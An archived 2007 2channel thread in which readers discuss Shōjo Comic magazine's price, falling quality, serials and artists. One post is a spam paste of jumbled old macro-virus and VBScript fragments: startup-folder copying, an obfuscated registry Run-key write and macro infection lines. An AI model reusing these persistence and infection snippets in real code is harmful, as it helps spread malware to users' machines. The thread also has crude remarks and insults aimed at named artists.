2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

少女コミックは好きですか?PART22

1 :花と名無しさん:2007/10/18(木) 00:11:50 ID:???O
少女コミックは好きですか?Part21
http://anime2.2ch.net/test/read.cgi/gcomic/1176333360/

少コミねっと
ttp://www.sho-comi.com/
【死体の横で】青木琴美*18th【( *^)-^*)チュウ】
http://anime2.2ch.net/test/read.cgi/gcomic/1176285930/

【ポップなレイプ】水波風南9ピチュクチュ【秘殺汁飛ばし】
http://anime2.2ch.net/test/read.cgi/gcomic/1169818890/
【おっぱいが】池山田剛 3【テニスボール】
http://comic6.2ch.net/test/read.cgi/gcomic/1156338913/
咲坂芽亜
http://comic6.2ch.net/test/read.cgi/gcomic/1108379175/

あゆみ凛LOVE☆★
http://anime2.2ch.net/test/read.cgi/gcomic/1158906567/

【少コミ新人】水瀬藍【まずは3回連載】PART3
http://anime2.2ch.net/test/read.cgi/gcomic/1184956310/

2 :花と名無しさん:2007/10/18(木) 00:23:32 ID:???O
少コミは好きですか?
http://salad.2ch.net/gcomic/kako/971/971027011.html
少コミは好きですか?2
http://salad.2ch.net/gcomic/kako/986/986483135.html
少コミは好きですか?3
http://comic.2ch.net/gcomic/kako/997/997063432.html
★★★『少コミ』は好きですか?★★★ーpart4-
http://comic.2ch.net/gcomic/kako/1009/10090/1009087889.html
†††『少コミ』は好きですか?†††ーpart5-
http://comic.2ch.net/gcomic/kako/1025/10255/1025511169.html
†††『少コミ』は好きですか?†††ーpart6-
http://comic.2ch.net/test/read.cgi/gcomic/1045570970/l50
†††『少コミ』は好きですか?†††ーpart7-
http://comic.2ch.net/test/read.cgi/gcomic/1055685940/l50
【ウホ!】すごく…エロイです 少コミpart8【ヤリマクリ】 
http://comic.2ch.net/test/read.cgi/gcomic/1059823851/l50
少コミは好きですか?part9
http://comic.2ch.net/test/read.cgi/gcomic/1064823584/
【汁ダラケ】少コミは好きでつか?part10【ピチクチ】
http://comic2.2ch.net/test/read.cgi/gcomic/1069662227/

3 :花と名無しさん:2007/10/18(木) 00:26:39 ID:???O
3:花と名無しさん :2007/04/12(木) 08:17:33 ID:???0 [sage]
少コミは好きですか?part11
http://comic6.2ch.net/test/read.cgi/gcomic/1080395942/
少女コミックは好きですか?part12 【少コミ】
http://comic6.2ch.net/test/read.cgi/gcomic/1094216675/
少女コミックは好きですか?Part13
http://comic6.2ch.net/test/read.cgi/gcomic/1105465524/
少女コミックは好きですか?part14 【少コミ】
http://comic6.2ch.net/test/read.cgi/gcomic/1116506512/
少女コミックは好きですか?Part15【少コミ】
http://comic6.2ch.net/test/read.cgi/gcomic/1125550557/
少女コミックは好きですか?part16 【少コミ】
http://comic6.2ch.net/test/read.cgi/gcomic/1130720198/
少女コミックは好きですか?Part17
http://comic6.2ch.net/test/read.cgi/gcomic/1141739582/
少女コミックは好きですか?Part18
http://comic6.2ch.net/test/read.cgi/gcomic/1152245133/
少女コミックは好きですか?Part19
http://comic6.2ch.net/test/read.cgi/gcomic/1157974182/

4 :花と名無しさん:2007/10/18(木) 00:31:32 ID:???O
  ハ,,ハ__
ヾ(゚ω゚=)| 寝るょぅ
 |\⌒~\
 \ |⌒⌒|
    ̄ ̄

5 :花と名無しさん:2007/10/18(木) 00:34:01 ID:???O
>>1

6 :花と名無しさん:2007/10/18(木) 01:09:31 ID:???0
乙〜
ところで提案
950以降で引越し準備ってテンプレに入れない?
もしくは携帯でもスレを立てるだけは立てる。テンプレは周りで支援とかって嫌かな?


7 :花と名無しさん:2007/10/18(木) 01:16:54 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2007/10/18(木) 01:27:55 ID:???0
スレ立て乙
この速度だと950じゃ早すぎる
975で十分

9 :花と名無しさん:2007/10/18(木) 01:46:11 ID:???O
そろそろ早売りの時期かな?

10 :花と名無しさん:2007/10/18(木) 02:10:55 ID:???0
>>7っていつもすごい速さで貼られるよね…
いつから粘着してるんだろうこの人。

11 :花と名無しさん:2007/10/18(木) 07:33:34 ID:???0
>>9
あと2日待とう

12 :花と名無しさん:2007/10/18(木) 15:58:30 ID:???O
ふと思ったんだけど、少コミ値下げするしかなくない?
月2だから、600円とかかかるなんて今の中身じゃ無理がありすぎる‥‥

漏れも最近は立ち読みになってしまった。前は必ずかってた。
今の少コミは馬鹿らしくて、そんなに払えない。

ジャンプみたく面白くて買いたくなるっていう作品が全くない。600円とか払ってまで。

13 :花と名無しさん:2007/10/18(木) 17:01:48 ID:???0
人から聞いたんだけど、
少コミって新人のうちは、編集部がエロ設定して描かされてるって本当なわけ?
とりあえず、新人はエロだけ描いてろみたいなwww

14 :花と名無しさん:2007/10/18(木) 17:08:23 ID:???0
エロ描きたくない人は、他の雑誌に投稿するのでは?

15 :花と名無しさん:2007/10/18(木) 19:12:17 ID:???0
>>12
むしろ値上げのほうがよくない?
惰性で買ってるような読者に振り回されすぎてる気がする。

16 :花と名無しさん:2007/10/18(木) 20:16:52 ID:???O
今の価値って100円位だな‥‥いくらまでなら買う?
漏れは出しても198円までだな。
立ち読み出来るから困らないし。古本屋にも2日後には80円で売られている。

17 :花と名無しさん:2007/10/18(木) 21:19:52 ID:qSs72uK3O
30円

18 :花と名無しさん:2007/10/18(木) 21:29:53 ID:???0
本誌はともかく、増刊670円は高すぎだろ・・・


19 :花と名無しさん:2007/10/18(木) 23:23:03 ID:???O
本誌なら180円。

増刊号なら380円
って所だな。
払うならだけど。もちろん今買ってない。

20 :花と名無しさん:2007/10/19(金) 08:28:41 ID:0LM1fdL/0
>>10
人じゃないと思いますが…

21 :花と名無しさん:2007/10/19(金) 11:56:47 ID:???O
人じゃないの??あれは何を書き込んでるんだ?

22 :花と名無しさん:2007/10/21(日) 15:22:37 ID:???O
age

23 :花と名無しさん:2007/10/21(日) 22:48:59 ID:???0
誰か千葉こずえのスレ作ってよ

24 :花と名無しさん:2007/10/22(月) 01:56:01 ID:???O
自分で立てなよ。
今22号の天ぷら作ったら、携帯からだと
改行多すぎでダメだった!ガ━━((゚Д゚;))━━ン

後日PCで作るか‥‥面倒だな‥‥

25 :花と名無しさん:2007/10/22(月) 02:10:36 ID:???0
ほい

表紙(池山田)…
今日恋…
翠くん…
ぎゅっと…
こいすた…
37℃…
姫系…
僕キミ…
恋してる(藍川)…
DNA…
オレンジ…
未完成(あゆみ)…
はなして…

ギャグ…
付録(王冠ネックレス)…

23号新連載(織田・市川)…
よみきり(ホンゴウ)…
付録(ヘアアクセ)…

26 :花と名無しさん:2007/10/22(月) 05:46:42 ID:a5Z+xVX40
あげてみよう

27 :花と名無しさん:2007/10/23(火) 15:56:30 ID:???0
表紙キメェww

28 :花と名無しさん:2007/10/23(火) 17:35:42 ID:???P
久々に池山田のエロ表紙に吹いた。

29 :花と名無しさん:2007/10/25(木) 16:25:56 ID:???O
何か池山田って、昔のほうが絵が良かった。
最近デフォルメおかしいし。気持ち悪くなってきてる‥‥

30 :花と名無しさん:2007/10/26(金) 04:23:34 ID:???0
>>23が立てたのか?w

純愛★千葉こずえ★一人目
http://anime2.2ch.net/test/read.cgi/gcomic/1193308554/


31 :花と名無しさん:2007/10/26(金) 15:28:32 ID:???0
スレタイのリア厨臭にワロタw

32 :花と名無しさん:2007/10/26(金) 17:55:25 ID:???0



今年のクリスマスケーキどうします?


33 :花と名無しさん:2007/10/27(土) 03:22:53 ID:???O
過疎ってるね〜。今の少コミで語れることが無いってことか‥‥
エロは減ってるし、後は話で勝負なんだろうけど‥
漏れ的に今の少コミは値段と釣り合ってないとオモ。
だから立ち読み人口が増える。
そうすると、ここも過疎る。何か萌キャラの描ける作家いないかな‥‥
原作付けるのも歓迎。

34 :花と名無しさん:2007/10/27(土) 15:24:40 ID:???0
漏れとかwww

35 :花と名無しさん:2007/10/27(土) 17:21:05 ID:???O
つーか、萌キャラて…www
話で勝負と言っている矢先、
キャラの魅力に頼ってしまう
ようではマズイのでは…?

36 :花と名無しさん:2007/10/27(土) 18:47:11 ID:???O
そんな事より、このスレ必要あんのか?って感じだよな。
過疎化しすぎて定番の人間しか来てないのが見て取れる。
990過ぎたら、次ぎスレ立てるとか決めといた方が良いと思うぞ。

37 :花と名無しさん:2007/10/30(火) 12:09:35 ID:???0
誰もテンプレ使ってないしwww

話題ないから話題振ってみる
最近期待してる新人って誰?
エロも減ってるし、話描けそうな作家…

自分は古賀・藤原・千葉・蜜樹に期待してる

38 :花と名無しさん:2007/10/30(火) 13:53:38 ID:???O
age

39 :花と名無しさん:2007/10/30(火) 16:17:44 ID:???O
誰も居ません。

40 :花と名無しさん:2007/10/31(水) 23:42:31 ID:Xl9DzdCqO
誰か今発売してる少コミの表紙うpして下さいm(_ _)m
近くの本屋行っても売り切れてて見れないんです

41 :花と名無しさん:2007/10/31(水) 23:46:01 ID:???0
発売してんのなら公式いけよ

42 :花と名無しさん:2007/11/01(木) 00:04:30 ID:okp5d3zTO
>>41携帯から見れない

43 :花と名無しさん:2007/11/01(木) 00:52:20 ID:???O
ネットカフェ行けば?漫画喫茶でも良いし。1時間400円位だぞ確か。

44 :花と名無しさん:2007/11/01(木) 22:06:43 ID:???O
PCって図書館とかにも置いて有るだろ。

45 :花と名無しさん:2007/11/04(日) 13:15:13 ID:liaOvJXZO
最近の少コミ面白くない

46 :花と名無しさん:2007/11/04(日) 14:04:55 ID:???O
無難でありきたりなの多いよな…

47 :花と名無しさん:2007/11/05(月) 00:58:58 ID:???O
個性的で、『奇抜』なのが欲しいね。個人的にはサスペンスが読みたい。
ミステリーとか‥‥まぁどう考えても原作付きになりそうだけどwww

48 :花と名無しさん:2007/11/05(月) 03:16:04 ID:???0
>>47
少コミ卒業して、他の雑誌読んだ方が早い希ガスw

49 :花と名無しさん:2007/11/05(月) 07:54:06 ID:???P
>>47
つJUDY

50 :花と名無しさん:2007/11/05(月) 10:22:25 ID:???O
花'sのが良くない?
あそこは確か、おばさんが、
少女の時に読んだマンガをコンセプトにしてるから、
絵柄が古臭い割にはそれ程対象年齢が高い内容じゃないし…。

(内容が難しいとか難しく無いとかじゃなくて、
JUDYとかプチコミは、やっぱレディース向けって内容だから…。)


なんか最近少コミの雑誌カラーって?
と疑問を持ち始めたんだが…。


携帯からだから、改行とかおかしかったらスマン。

51 :花と名無しさん:2007/11/05(月) 16:37:49 ID:???0
> 絵柄が古臭い割にはそれ程対象年齢が高い内容じゃない
それはあなたが年取ってるからそう感じるだけ。

52 :花と名無しさん:2007/11/05(月) 18:42:29 ID:???O
高校生ですがなにかw

ってか、マンガ雑誌を買うこと事態を卒業すればいくね?
自分が満足いく雑誌がなければ、
わざわざ定期的にマンガを買う必要性は
何処にも無いと思うのだが…。

53 :花と名無しさん:2007/11/05(月) 20:45:35 ID:???O
立ち読み程度なんじゃん?わざわざ買う必要もないしwww
金払う価値があるかどうかだよね。

54 :花と名無しさん:2007/11/08(木) 00:48:26 ID:???0
なんか携帯厨のオバが自演してんな。

55 :花と名無しさん:2007/11/08(木) 02:01:28 ID:???0
>>54
え?どれとどれ?

56 :花と名無しさん:2007/11/08(木) 22:15:40 ID:???0
>>55
>>50>>52>>53

57 :花と名無しさん:2007/11/08(木) 23:25:30 ID:???O
>>56厨だな。バカの一つ覚えかー?全部別人だろが。

58 :花と名無しさん:2007/11/09(金) 10:58:18 ID:???0
本屋に行ったら、
少コミが平置き一列なのに対して花ゆめが二列だった。
なんか露骨でワラタwww
大抵いつも、付録がでかい分少コミの方が厚いから
数は尚更少ないんだよね。

59 :花と名無しさん:2007/11/09(金) 12:33:31 ID:???O
売り上げ落ちてるんだ‥‥不景気も響いてるね。
月1と月2発刊じゃ。しかも少コミ『中身』の割に高いし。
月600円も払いたくない。だから実際買わない。
立ち読みか、借りて読むだけ。コミクスは気に入れば買う。ブクオフでwwww

60 :花と名無しさん:2007/11/09(金) 14:58:59 ID:???0
今号読みきりの時代物っぽいやつ、あれなに?
吐き気がした。

61 :花と名無しさん:2007/11/09(金) 15:48:31 ID:???0
>>60吐き気はしないが最悪だった。

62 :花と名無しさん:2007/11/09(金) 17:41:26 ID:???O
藤原なおさんや、今回の時代劇物は新しい風を吹かせてくれたから
嬉しかった。まだまだ未熟な感じで、読みにくい等は否めないけど、
これからもああいった異色な感じの違う風を吹かせて欲しい。
ガンガン増やして、読みごたえある雑誌になると良いな゚+。(*′∇`)。+゚

63 :花と名無しさん:2007/11/09(金) 18:07:54 ID:???0
>>60
主人公の靴にどんびきした

64 :花と名無しさん:2007/11/09(金) 18:25:01 ID:???O
>>62藤原なおの、前に読み切りで載った、裁判所で判決から始まるやつ良かったw
藤原なおまた載らないかなー・・
それより織田綺に引退してほしい。つまらないし、絵にもキャラにも飽きた。
昔の連載は良かったのに、段々‥‥orz
今回の読み切りも、設定がありきたり過ぎ!
ご都合主義でつまらなかったし‥‥

65 :花と名無しさん:2007/11/09(金) 19:54:04 ID:???O
放課後オレンジはおもしろい。
前作はよくなかったけど今作はいいな。

66 :花と名無しさん:2007/11/10(土) 02:27:49 ID:???0
>>62
新しい?
確かに少コミには新しいかもしれないが、
昔からオタクが描く話で何も新しくないな。
むしろ古い。
一頁目から最後が想像できたよ。

67 :花と名無しさん:2007/11/10(土) 02:27:54 ID:???O
こうし先輩に魅力がもっとあれば‥‥
あと、マネージャーさんにも。

68 :花と名無しさん:2007/11/10(土) 09:52:30 ID:???0
>確かに少コミには新しいかもしれないが、

これが大事なんじゃないの?
少コミ読者がオタク雑誌も読んでる率は年齢的にも少ないだろうし
新しいとか他と違うイメージはあると思うよ

69 :花と名無しさん:2007/11/10(土) 11:24:40 ID:???O
時代物の読み切り、背景さえも自分で描いてないで素材集をそのまま貼ってて読む気無くした。
展開も先が読めるってゆうか…よく見る話過ぎて、あれを載せる意味があったのか疑問。
誰かの埋め合わせ?

70 :花と名無しさん:2007/11/10(土) 11:44:07 ID:???O
最近は読む方に読解力や視野の狭さが目立つようになっている。
だからこそ異色なカラーの漫画は必要だ。藤原なおの読み切りもそうだったけど、
どんどん新しくしていって欲しい。
新しい時代はそうして築かれていく。PS眉短の時もそうだった様にね。

71 :sage:2007/11/10(土) 23:30:32 ID:ihpkv27h0
ずっと思ってたんだけど、

悠妃りゅうと車谷晴子の昔の作品ってエピソードや名前の
かぶり、多すぎじゃない?
同じとこで書いてんのに… なんで? 仲良し?

 

72 :花と名無しさん:2007/11/10(土) 23:35:22 ID:???O
sageはメル欄ね

73 :花と名無しさん:2007/11/10(土) 23:47:06 ID:???0
sage

74 :花と名無しさん:2007/11/10(土) 23:49:03 ID:4HUj3qwp0
age

75 :sage:2007/11/10(土) 23:55:27 ID:???0
>>72 了解 失礼(__)


76 :花と名無しさん:2007/11/11(日) 01:00:57 ID:???0
放課後オレンジってなんかインパクトない希ガス。
ふ〜ん・・・・と流し読みして終わる。空気作家カテゴリに入ってるわ

77 :花と名無しさん:2007/11/11(日) 02:46:48 ID:???O
放課後オレンジは不快にならないから今のままでいい。

78 :花と名無しさん:2007/11/11(日) 10:30:36 ID:???0
>>71
自分も気づいてたけど大概車谷が後から悠妃と同じことやってた
つか車谷って悠妃だけじゃなく他の作家からパクリすぎ


79 :花と名無しさん:2007/11/11(日) 11:50:09 ID:???O
あれ…確か車谷と悠妃って、同じ担当がついてた(る?)んじゃなかったっけ?
定かじゃないけどそんなような話を聞いた覚えがあるよ。無能で引き出しの少ない
編集が居て、自分が担当しているどの作家に対しても、同じような設定・内容の話を
勧めて描かせようとするらしい。だから、結果としてモロ被りな作品を描いてしまう
ケースがあるのはガチだとかって。

まぁ、もともとパクリ癖のある作家なんて沢山居るから一概に何とも言えないけどねw

80 :花と名無しさん:2007/11/11(日) 12:07:24 ID:???0
パクリ作家も被りも同じ話ばっかりもそれがガッカンクオリティ。

81 :花と名無しさん:2007/11/11(日) 17:54:33 ID:???O
だから余計に少コミに新風吹かせて欲しいよね。時代劇ものでも
ホラーでもSFでもファンダジーでも良いから。新しい時代を作って欲しい。
昔、眉丹の時は乳首描いて少コミはエロ雑誌に変化したじゃん、
今それを壊わす人材が必要とされてるね。

82 :花と名無しさん:2007/11/11(日) 19:11:13 ID:???0
いらないかもしれないが、テンプレ

表紙:咲坂……

連載
姫系(咲坂)……
DNA(車谷)……
今日恋(水波)……
HOBBY(市川)……
翠くん(池山田)……
オレンジ(くまがい)……
僕キミ(青木)……
ぎゅっと(千葉)……
こいすた(悠妃)……
37℃(水瀬)……

読切
女王様(織田)……
満月(ホンゴウ)……

ギャグ&ショート
売れッッコ(清水)……
うりうり(南野)……
らぶはむ(遠野)……
まんが教室(車谷)……

24号予告
新連載:蜜樹 読切:伊吹、藤中 ……

83 :花と名無しさん:2007/11/11(日) 19:12:46 ID:???0
読んだのだけ使ってみる。

表紙:咲坂……元気で可愛いと思う。

姫系(咲坂)……この手の展開はちょっと。デザイナーネタは面白そうなんだが。
DNA(車谷)……絵は好み。ベタだが続き気になる。王道ネタなのに展開早すぎるのが残念。
今日恋(水波)……ヒーローアホすぎだが続き気になる。エロに行くなよ。ここらが限度。
HOBBY(市川)……絵は割と好み。話も悪くないんだけど、あまり印象に残らないのが。
翠くん(池山田)……絵が好み。カズマいい奴だが個人的には司派だ。
オレンジ(くまがい)……ちょっと面白くなってきた。恋愛いらないからこのままスポ根で行って欲しい。
僕キミ(青木)……く、暗い…。突き落とされた。五十嵐が気の毒。
ぎゅっと(千葉)……ヒロインいい子だ。ヒーロー3ヶ所もキスしたんか。
こいすた(悠妃)……んー。元カノ出現→悪役ネタはイマイチ。
37℃(水瀬)……昼メロ要素は結構好きだがキャラが子供過ぎて駄目だ。展開も詰込すぎの印象。
女王様(織田)……絵は苦手だが話が好み。面白かった。
満月(ホンゴウ)……話はイマイチだがこういう作風は割と好み。
和風にするなら刑事じゃなくて岡引にして欲しかった。殺陣シーンももうちょいなんとか。

84 :花と名無しさん:2007/11/11(日) 19:34:39 ID:???0
>>79
糞編集として有名な岡田が担当だったんだよね
岡田テンプレもどこかにあったような
今は別の雑誌にいるんだっけ?

85 :花と名無しさん:2007/11/12(月) 01:33:48 ID:???0
織田さんは連載はつまんないけど読みきりは好き。可愛い話多いし。
月1連載でいいからもうずっと読みきり描いていけばいいのにw
まぁ好きだけどありきたりだな、とは思う。

86 :花と名無しさん:2007/11/12(月) 01:55:12 ID:???0
>>85
でも今回のカラーって脂混じってるかんじで気持ち悪かった。
なんか年寄りっぽい塗り方。

87 :花と名無しさん:2007/11/12(月) 02:14:00 ID:???0
織田綺の漫画って薄っぺらい
内容が無くてキャラだけで進めてる感じ
毎回毎回俺様キャラばっかだし
絵は好きなんだけどなー

88 :花と名無しさん:2007/11/12(月) 21:48:38 ID:???O
織田さんは絵は良いけどね。つまんないし‥‥もう引退して欲しいかな。
読み切りなら増刊号で十分。キャラも似たり寄ったりで話もイマイチだし。

89 :花と名無しさん:2007/11/12(月) 22:17:09 ID:???0
暇だからゴチ。

表紙:咲坂……華やかだし可愛いから、目立つ

連載
姫系(咲坂)……トーンの使いすぎで、どのページも見にくい
DNA(車谷)……
今日恋(水波)……普通に面白かった
HOBBY(市川)……
翠くん(池山田)……サッカー描写、適当すぎだろwww
オレンジ(くまがい)……早く続きが読みたい
僕キミ(青木)……昂の心の変化が露骨すぎて、説得力が無い
ぎゅっと(千葉)……
こいすた(悠妃)……
37℃(水瀬)……

読切
女王様(織田)……絵が劣化しててガッカリ
満月(ホンゴウ)……花ゆめ逝け

90 :花と名無しさん:2007/11/13(火) 22:41:17 ID:???0
>>89
同じく、今回の織田さんの絵はひどいと思った!!
てか、少コミって絵のうまい人が少ないよねw

91 :花と名無しさん:2007/11/14(水) 07:02:39 ID:???0
逝け山田とくまがいは上手いと思う

92 :花と名無しさん:2007/11/14(水) 16:17:53 ID:???0
くまがいはいいとして、池山田がうまいって…
もしかして釣り? 釣られた?

93 :花と名無しさん:2007/11/14(水) 20:54:58 ID:???0
>>92
「いかにも少女漫画」って絵で、かわいいじゃん。
むしろ、くまがいをうまいと思う感覚の方がわからんww

自分は、絵だけ見たら汁ミが一番うまいと思う。

94 :花と名無しさん:2007/11/14(水) 21:49:17 ID:???O
池山田の絵、可愛いけど少女漫画絵じゃなくてオタ絵じゃない?
絵だけ見て上手いと思ったのは私も汁ミ。あと古賀と白石。
水瀬もパッと見だけなら可愛い。

95 :花と名無しさん:2007/11/14(水) 22:19:52 ID:???0
>>94
絵がうまくても話が(あらゆる意味で)ひどいんじゃ
どーにもならんだろ・・・

96 :花と名無しさん:2007/11/14(水) 22:48:17 ID:???0
絵がうまい人は、普段描かないようなものを描いても
無難にこなせる。

汁ミはがんばってるとは思うけど、うまくはないよ。
水瀬もその部類。
古賀と白石はうまい。
くまがいと織田はわからんね。それでも汁ミ・水瀬よりは上手そうに見せる
知恵とテクがある。
池山田はヘタだし努力も感じない。

97 :花と名無しさん:2007/11/14(水) 23:50:56 ID:???0
可愛いとか魅力的な絵が必ずしも画力がある、ということにはならないから難しい

98 :花と名無しさん:2007/11/14(水) 23:55:07 ID:???0
結局、どんな絵を上手いと感じるかなんて、人それぞれだよね。
万人が認める漫画家なんて、存在しないだろうし。

99 :花と名無しさん:2007/11/15(木) 00:15:28 ID:???O
好みだよね。要は。私は絵ならあゆみ、藍川、水波、しがの‥‥
の、順番で好きかな。

100 :花と名無しさん:2007/11/15(木) 09:22:39 ID:???0
汁ミはデッサンがすさまじい時あるよね
線が小奇麗だから余計目立つ
上手いところとやばいところの差が大きすぎて悪目立ちしてる感じ
デフォルメ顔なのに身体だけがっしりしてるの見た時は吹いた

話の内容もなんかそんな感じで、
ギャグを変なところに入れて浮いたりしてる



101 :花と名無しさん:2007/11/15(木) 11:13:30 ID:???0
少コミはギャグが全滅だよね
少女漫画だからしょうがないのかもしれないけど

102 :花と名無しさん:2007/11/15(木) 20:54:14 ID:???0
織田ってまだいるのか。アシスタント行ったことあるけど
今まで会ったことのある人間の中で一番やなやつだった。
早く仕事なくなればいいのに。

103 :花と名無しさん:2007/11/15(木) 21:10:43 ID:???0
>>102
kwsk

104 :花と名無しさん:2007/11/16(金) 11:22:45 ID:je9B4Gwh0
!!えらそうに…市ね

105 :花と名無しさん:2007/11/16(金) 15:01:21 ID:???O
織田綺はもう引退で良いよ〜。話も毎回つまんないし別に感動も何もない。

眉短みたいにガッカン以外で描けばいいのにな

106 :花と名無しさん:2007/11/16(金) 16:52:10 ID:???0
織田アンチの粘着が一匹いるね。
そういう私もかなりの池山田アンチ。

107 :花と名無しさん:2007/11/16(金) 19:00:06 ID:???0
増刊のとはずがたり、なんか変じゃなかった?
親が後白河なのは御所様であって、二条の親は普通の貴族だよね?

108 :花と名無しさん:2007/11/16(金) 20:41:28 ID:???0
ぷっちのだけは面白いよ<ギャグ
他はつまんなさすぎて読まなくなったが

109 :花と名無しさん:2007/11/16(金) 22:14:09 ID:???0
本人乙

110 :花と名無しさん:2007/11/16(金) 23:50:34 ID:???O
??誰?

前はいのししのも読んでたけど、メガネのがキモい。

111 :花と名無しさん:2007/11/17(土) 10:31:24 ID:???0
メガネ?
小学館の女性漫画の4コマで一番好きなのは、プチコミ系にのってるジゴロちゃんだな、私は。
あれ、シュールだし、笑える

112 :花と名無しさん:2007/11/17(土) 13:17:35 ID:???0
自分もプッチといのししだけ読んでる。
次藤中さんか、この人深海魚さんとかぶるw

113 :花と名無しさん:2007/11/17(土) 16:37:55 ID:???O
集英社の雑誌クッキー(NANAが載ってるやつ)の、チヨチヨは読む。
ギャグで。太っちょひよこと腹黒女の話。
良いキャラで長く連載してるし。シニカルで面白い。

114 :花と名無しさん:2007/11/17(土) 23:16:24 ID:???0
>>102
あなたとは知り合いかもしれん
私もあの人は最低だと思う

115 :花と名無しさん:2007/11/17(土) 23:52:13 ID:???0
>>102
そういう書き込み3、4年前にもこのスレで見たな

116 :花と名無しさん:2007/11/18(日) 10:24:27 ID:???O
この際友達にでもなれば?

117 :花と名無しさん:2007/11/19(月) 03:28:09 ID:???0
アッー

118 :花と名無しさん:2007/11/20(火) 00:47:21 ID:???0
千葉さん次は長期かなー
いつも同じような話だけど絵が可愛いから許す

119 :花と名無しさん:2007/11/20(火) 10:49:31 ID:???0
ギャグ漫画は売れっ子がつまらなすぎる。
はよ終わってくれと思ってたら、ぐうが最終回だった・・・悲しい

120 :花と名無しさん:2007/11/20(火) 19:00:48 ID:???O
千葉さん今回間違っちゃったね!読み切りの雰囲気のまんまで連載すれば、
確実に長期連載にこぎつけたとオモタ。読み切りの方が魅力があった。連載に切り替える際に、
細かい設定がミスったと思う。
おしいよな〜。主人公が自分の事を名前で読んだりしたのには連載期待していたのに、かなり引いたもん‥‥
キャラ変わりすぎだ‥‥話し自体の雰囲気も変わっちゃったし‥‥残念の一言だったΣ( ̄□ ̄;

121 :花と名無しさん:2007/11/21(水) 00:38:55 ID:???O
age

122 :花と名無しさん:2007/11/21(水) 06:15:51 ID:???0
個人的には千葉さんの今回の連載好きだったよ。
たしかにいつもとは違ったけど、まあこれはこれで。

123 :花と名無しさん:2007/11/21(水) 11:43:59 ID:???0
そうか?変な百合描かれるよりマシだが…

124 :花と名無しさん:2007/11/21(水) 13:08:24 ID:???O
確かに、今回の話は読み切りの方が面白かったキガス・・・・連載になったら面白しろさ50%Downって感じ。

125 :花と名無しさん:2007/11/21(水) 18:58:14 ID:???0
主人公がだいぶ退行したよね
でもかわいかったから許す

126 :花と名無しさん:2007/11/22(木) 01:19:14 ID:???O
可愛いけど、バカっぽいし‥‥好感持てなかった。

127 :花と名無しさん:2007/11/22(木) 04:54:03 ID:???0
絵でもってるよね…。あれで下手絵だったら多分読んでないな

128 :花と名無しさん:2007/11/22(木) 07:43:59 ID:???0
今号の表紙の女の方の首おかしすぎ・・・・

129 :花と名無しさん:2007/11/23(金) 06:20:49 ID:???0
ほんとだ。
オレンジは展開早いけど連載短縮?

130 :花と名無しさん:2007/11/23(金) 17:22:56 ID:???O
いきなりエロ話に転向したりしてw
爽やかなスポコンから一転、汁ミ顔負けのドギツイピチュクチュ。
‥‥熊谷さんには描けなさそうだがw

131 :花と名無しさん:2007/11/24(土) 07:24:34 ID:???0
>>130
そんな極端な変化、あるわきゃねーだろ、いくらなんでもw

132 :花と名無しさん:2007/11/25(日) 04:42:29 ID:uPwCeaM3O
オレンジおもしろい。翼がキスした。

133 :花と名無しさん:2007/11/25(日) 23:20:32 ID:???O
蜜樹の新連載、なんか先が読めるんだが…
女の目がデカ過ぎてバランス悪いし。
ついでに携帯もめちゃくちゃデカイw

134 :花と名無しさん:2007/11/26(月) 02:13:28 ID:???0
>>133
先が読めるなら予言してみたら?

・ハッピーエンド
→少コミだから当たり前

・主人公のピンチをヒーローが助けてくれる
→少コミだから当たり前

・主人公がヒーローとセクースして「きもちいい!」
→少コミだから当たり前

この程度は当たり前だから、これより詳しく。

135 :花と名無しさん:2007/11/26(月) 07:03:35 ID:???0
134は何でケンカごしなん?

136 :花と名無しさん:2007/11/26(月) 09:45:57 ID:???O
予言じゃなくてそう言ったことは予想の方が適切。

なんでそんなに食ってかかってんだ?


自分も携帯がデカいのには笑った。
カラーもなんかアレだったな…。
個人的に前号読めなかったから、
藤原タンのキモイ靴が拝めなくてがっかり…。

137 :花と名無しさん:2007/11/27(火) 14:53:50 ID:???O
少コミ(増刊も可)から消えて欲しい作家。

1伊吹楓(キャラがムチムチしてキモイ、マジで男性誌向きだとオモ、話も毎回雰囲気が少コミに合っていない)

2織田綺(絵柄に飽きた、話も途中からグダグダでついてけない、読む気がしない)

あくまで個人的意見

138 :花と名無しさん:2007/11/27(火) 16:38:12 ID:???0
・しがの ワンパっつーかやる気あんの?
・池山田 幼稚な主人公マンセーがキモイ

139 :花と名無しさん:2007/11/27(火) 23:16:28 ID:???P
しがのはちゅちゅ島流できるが池山田は人気あるからな…

140 :花と名無しさん:2007/11/27(火) 23:47:49 ID:???O
伊吹楓は少年ジャン●か、マガ●ンか、ヤンマ●か、スーパージャン●あたりへ。
織田綺はjud●あたり。
しがのはチュチュ行きか、増刊行きも時間の問題の状態。前連載も打ち切りだったし。
池山田はまだ違うキャラを描く可能性もあるから微妙だ‥‥


141 :花と名無しさん:2007/11/27(火) 23:52:00 ID:???O
クリスマス

  *.';+.。 .*;'.*
 ;'    *   ';
 *.         *
 '.       ,'
  *      *
   ':   ;.'
    '+. .*゚
      '


   ∧∧∧∧
  (  (  )
  /  |  ヘ
_〜、__〜__)___
_/_/_/_/_/_/_/_/_/_/
/_/_/_/_/_/_/_/_/_/


142 :花と名無しさん:2007/11/27(火) 23:55:38 ID:???0
で、結論は
青木しか読ませる漫画を描いてない


143 :花と名無しさん:2007/11/28(水) 00:10:02 ID:???0
